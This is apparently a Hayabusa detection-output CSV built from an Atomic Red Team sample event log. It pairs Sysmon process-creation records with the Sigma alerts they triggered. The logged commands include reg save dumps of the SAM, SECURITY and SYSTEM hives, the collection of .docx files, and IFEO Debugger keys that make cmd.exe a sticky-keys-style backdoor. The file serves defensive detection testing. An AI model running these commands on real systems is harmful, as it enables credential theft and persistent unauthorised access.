2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 1472 | PGUID: 747F3D96-D87D-5D31-0000-00107D793100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3616 | PGUID: 747F3D96-D87D-5D31-0000-0010B37B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 1340 | PGUID: 747F3D96-D87D-5D31-0000-0010057E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D87D-5D31-0000-00103B803100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 1224 | PGUID: 747F3D96-D87D-5D31-0000-00108D823100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3900 | PGUID: 747F3D96-D87D-5D31-0000-0010CA843100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 3412 | PGUID: 747F3D96-D87D-5D31-0000-00101C873100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D87D-5D31-0000-0010FA8A3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 6536 | PGUID: 747F3D96-D87D-5D31-0000-00104C8D3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1728 | PGUID: 747F3D96-D87D-5D31-0000-0010958F3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\Security security.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D87D-5D31-0000-0010E4913100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3904 | PGUID: 747F3D96-D883-5D31-0000-0010839B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\System system.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | LID: 0x50951 | PID: 1300 | PGUID: 747F3D96-D883-5D31-0000-0010D49D3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D885-5D31-0000-00107F1A3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SAM sam.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | LID: 0x50951 | PID: 4140 | PGUID: 747F3D96-D885-5D31-0000-0010D11C3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D887-5D31-0000-0010D51F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D88F-5D31-0000-0010BD353200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command Prompt,,rules/sigma/process_creation/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 608 | PGUID: 747F3D96-D890-5D31-0000-001012383200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command Prompt,,rules/sigma/process_creation/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .docx | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 6328 | PGUID: 747F3D96-D890-5D31-0000-0010A5383200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1568 | PGUID: 747F3D96-D890-5D31-0000-0010FA3F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D890-5D31-0000-001085443200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1228 | PGUID: 747F3D96-D89A-5D31-0000-0010A46B3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1132 | PGUID: 747F3D96-D89A-5D31-0000-0010F2703200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 864 | PGUID: 747F3D96-D89F-5D31-0000-00106C7D3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D89F-5D31-0000-0010BD7F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1860 | PGUID: 747F3D96-D89F-5D31-0000-0010BD7F3200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2404 | PGUID: 747F3D96-D89F-5D31-0000-0010BC823200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D8A2-5D31-0000-00108A8F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 2272 | PGUID: 747F3D96-D8A2-5D31-0000-0010D5913200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2272 | PGUID: 747F3D96-D8A2-5D31-0000-0010D5913200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2484 | PGUID: 747F3D96-D8A2-5D31-0000-0010D8943200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4212 | PGUID: 747F3D96-D8A5-5D31-0000-0010729B3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D8A5-5D31-0000-0010C39D3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
